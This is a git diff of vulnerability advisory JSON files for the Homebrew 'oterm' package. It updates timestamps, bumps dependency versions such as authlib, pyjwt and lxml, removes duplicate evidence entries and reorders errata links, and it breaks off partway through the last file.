a/advisories/BREW-oterm-CVE-2026-25645.json +++ b/advisories/BREW-oterm-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-25645", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-27932.json b/advisories/BREW-oterm-CVE-2026-27932.json index c1b21c7b76b..07ba8ae7abf 100644 --- a/advisories/BREW-oterm-CVE-2026-27932.json +++ b/advisories/BREW-oterm-CVE-2026-27932.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-27932", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-w5r5-m38g-f9f9", "CVE-2026-27932", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.3", "resource": "joserfc", - "resource_purl": "pkg:pypi/joserfc@1.7.4" + "resource_purl": "pkg:pypi/joserfc@1.7.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", - "resource": "joserfc" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", + "subject_version": "1.7.5", + "key": "pkg:pypi/joserfc@1.7.5", "resource": "joserfc" } ] diff --git a/advisories/BREW-oterm-CVE-2026-27962.json b/advisories/BREW-oterm-CVE-2026-27962.json index 6e283d9f596..2b1b27effdc 100644 --- a/advisories/BREW-oterm-CVE-2026-27962.json +++ b/advisories/BREW-oterm-CVE-2026-27962.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-27962", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-wvwj-cvrp-7pv5", "CVE-2026-27962", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.9", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-28490.json b/advisories/BREW-oterm-CVE-2026-28490.json index 47e6c642c4b..e7edeaf7c49 100644 --- a/advisories/BREW-oterm-CVE-2026-28490.json +++ b/advisories/BREW-oterm-CVE-2026-28490.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-28490", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-7432-952r-cw78", "CVE-2026-28490", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.9", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-28498.json b/advisories/BREW-oterm-CVE-2026-28498.json index 7540c957f88..c92e8daec32 100644 --- a/advisories/BREW-oterm-CVE-2026-28498.json +++ b/advisories/BREW-oterm-CVE-2026-28498.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-28498", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-m344-f55w-2m6j", "CVE-2026-28498", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.9", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-28684.json b/advisories/BREW-oterm-CVE-2026-28684.json index c29ad5900ed..696de03b3b9 100644 --- a/advisories/BREW-oterm-CVE-2026-28684.json +++ b/advisories/BREW-oterm-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-28684", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", - "resource": "python-dotenv" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-oterm-CVE-2026-28802.json b/advisories/BREW-oterm-CVE-2026-28802.json index 64aa3e7559d..942f18cde90 100644 --- a/advisories/BREW-oterm-CVE-2026-28802.json +++ b/advisories/BREW-oterm-CVE-2026-28802.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-28802", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-7wc2-qxgw-g8gg", "CVE-2026-28802", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.7", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-30922.json b/advisories/BREW-oterm-CVE-2026-30922.json index d58a8cb2c56..ebf470b8524 100644 --- a/advisories/BREW-oterm-CVE-2026-30922.json +++ b/advisories/BREW-oterm-CVE-2026-30922.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-30922", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jr27-m4p2-rc6r", "CVE-2026-30922", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -85,10 +77,6 @@ "type": "WEB", "url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0" }, - { - "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:10184" - }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:22970" @@ -117,6 +105,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:65126" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:6568" @@ -165,6 +157,10 @@ "type": "WEB", "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-30922.json" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:10184" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:12176" diff --git a/advisories/BREW-oterm-CVE-2026-32597.json b/advisories/BREW-oterm-CVE-2026-32597.json index 27e6db4b801..2f2c9b611c3 100644 --- a/advisories/BREW-oterm-CVE-2026-32597.json +++ b/advisories/BREW-oterm-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-32597", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-34450.json b/advisories/BREW-oterm-CVE-2026-34450.json index 259358c1f48..55ab166d294 100644 --- a/advisories/BREW-oterm-CVE-2026-34450.json +++ b/advisories/BREW-oterm-CVE-2026-34450.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-34450", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-q5f5-3gjm-7mfm", "CVE-2026-34450", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.87.0", "resource": "anthropic", - "resource_purl": "pkg:pypi/anthropic@0.120.2" + "resource_purl": "pkg:pypi/anthropic@1.3.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "anthropic", - "subject_version": "0.120.2", - "key": "pkg:pypi/anthropic@0.120.2", - "resource": "anthropic" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "anthropic", - "subject_version": "0.120.2", - "key": "pkg:pypi/anthropic@0.120.2", + "subject_version": "1.3.0", + "key": "pkg:pypi/anthropic@1.3.0", "resource": "anthropic" } ] diff --git a/advisories/BREW-oterm-CVE-2026-34452.json b/advisories/BREW-oterm-CVE-2026-34452.json index 99af9332b21..719fce11c59 100644 --- a/advisories/BREW-oterm-CVE-2026-34452.json +++ b/advisories/BREW-oterm-CVE-2026-34452.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-34452", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-w828-4qhx-vxx3", "CVE-2026-34452", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.87.0", "resource": "anthropic", - "resource_purl": "pkg:pypi/anthropic@0.120.2" + "resource_purl": "pkg:pypi/anthropic@1.3.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "anthropic", - "subject_version": "0.120.2", - "key": "pkg:pypi/anthropic@0.120.2", - "resource": "anthropic" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "anthropic", - "subject_version": "0.120.2", - "key": "pkg:pypi/anthropic@0.120.2", + "subject_version": "1.3.0", + "key": "pkg:pypi/anthropic@1.3.0", "resource": "anthropic" } ] diff --git a/advisories/BREW-oterm-CVE-2026-40347.json b/advisories/BREW-oterm-CVE-2026-40347.json index 18358cb6de4..b41a934bf87 100644 --- a/advisories/BREW-oterm-CVE-2026-40347.json +++ b/advisories/BREW-oterm-CVE-2026-40347.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-40347", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-mj87-hwqh-73pj", "CVE-2026-40347", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-41066.json b/advisories/BREW-oterm-CVE-2026-41066.json index aa2ea1e103c..bea93d2f163 100644 --- a/advisories/BREW-oterm-CVE-2026-41066.json +++ b/advisories/BREW-oterm-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-41066", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.1.0", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2026-41425.json b/advisories/BREW-oterm-CVE-2026-41425.json index 6a6467a0e87..1b72ff598d5 100644 --- a/advisories/BREW-oterm-CVE-2026-41425.json +++ b/advisories/BREW-oterm-CVE-2026-41425.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-41425", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-jj8c-mmj3-mmgv", "CVE-2026-41425", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.11", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-41479.json b/advisories/BREW-oterm-CVE-2026-41479.json index 95c109dc454..a4ac89e16aa 100644 --- a/advisories/BREW-oterm-CVE-2026-41479.json +++ b/advisories/BREW-oterm-CVE-2026-41479.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-41479", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-w8p2-r796-3vmq", "CVE-2026-41479", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.7.1", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-42561.json b/advisories/BREW-oterm-CVE-2026-42561.json index bec8af8f388..65d74b5a527 100644 --- a/advisories/BREW-oterm-CVE-2026-42561.json +++ b/advisories/BREW-oterm-CVE-2026-42561.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-42561", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-pp6c-gr5w-3c5g", "CVE-2026-42561", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-44431.json b/advisories/BREW-oterm-CVE-2026-44431.json index dc9478e4a3a..53a4a906b35 100644 --- a/advisories/BREW-oterm-CVE-2026-44431.json +++ b/advisories/BREW-oterm-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-44431", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-44432.json b/advisories/BREW-oterm-CVE-2026-44432.json index 615a03809a9..58cd98b58cf 100644 --- a/advisories/BREW-oterm-CVE-2026-44432.json +++ b/advisories/BREW-oterm-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-44432", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-44681.json b/advisories/BREW-oterm-CVE-2026-44681.json index 211dddb231d..12150c529cb 100644 --- a/advisories/BREW-oterm-CVE-2026-44681.json +++ b/advisories/BREW-oterm-CVE-2026-44681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-44681", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-r95x-qfjj-fjj2", "CVE-2026-44681", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.7.1", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-4539.json b/advisories/BREW-oterm-CVE-2026-4539.json index d0eefbbfd98..016c39cf4bf 100644 --- a/advisories/BREW-oterm-CVE-2026-4539.json +++ b/advisories/BREW-oterm-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-4539", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-oterm-CVE-2026-45409.json b/advisories/BREW-oterm-CVE-2026-45409.json index d0899cc0adb..244bf57b384 100644 --- a/advisories/BREW-oterm-CVE-2026-45409.json +++ b/advisories/BREW-oterm-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-45409", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-oterm-CVE-2026-46678.json b/advisories/BREW-oterm-CVE-2026-46678.json index 151c9749ea6..432e107f8e1 100644 --- a/advisories/BREW-oterm-CVE-2026-46678.json +++ b/advisories/BREW-oterm-CVE-2026-46678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-46678", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-cqp8-fcvh-x7r3", "CVE-2026-46678", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.99.0", "resource": "pydantic-ai-slim", - "resource_purl": "pkg:pypi/pydantic-ai-slim@2.17.0" + "resource_purl": "pkg:pypi/pydantic-ai-slim@2.37.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", - "resource": "pydantic-ai-slim" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", + "subject_version": "2.37.0", + "key": "pkg:pypi/pydantic-ai-slim@2.37.0", "resource": "pydantic-ai-slim" } ] diff --git a/advisories/BREW-oterm-CVE-2026-48522.json b/advisories/BREW-oterm-CVE-2026-48522.json index 35ca52ed3bd..1670111b3f3 100644 --- a/advisories/BREW-oterm-CVE-2026-48522.json +++ b/advisories/BREW-oterm-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48522", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-48523.json b/advisories/BREW-oterm-CVE-2026-48523.json index 2f20cffabda..faa32f03a11 100644 --- a/advisories/BREW-oterm-CVE-2026-48523.json +++ b/advisories/BREW-oterm-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48523", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-48524.json b/advisories/BREW-oterm-CVE-2026-48524.json index 9d1fb9742f5..c291feb3cf7 100644 --- a/advisories/BREW-oterm-CVE-2026-48524.json +++ b/advisories/BREW-oterm-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48524", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-48525.json b/advisories/BREW-oterm-CVE-2026-48525.json index 778541c7d59..acf11828772 100644 --- a/advisories/BREW-oterm-CVE-2026-48525.json +++ b/advisories/BREW-oterm-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48525", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-48526.json b/advisories/BREW-oterm-CVE-2026-48526.json index ab0211046eb..5adee73883e 100644 --- a/advisories/BREW-oterm-CVE-2026-48526.json +++ b/advisories/BREW-oterm-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48526", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-48710.json b/advisories/BREW-oterm-CVE-2026-48710.json index 0a37a423e02..7ef53e62f86 100644 --- a/advisories/BREW-oterm-CVE-2026-48710.json +++ b/advisories/BREW-oterm-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": 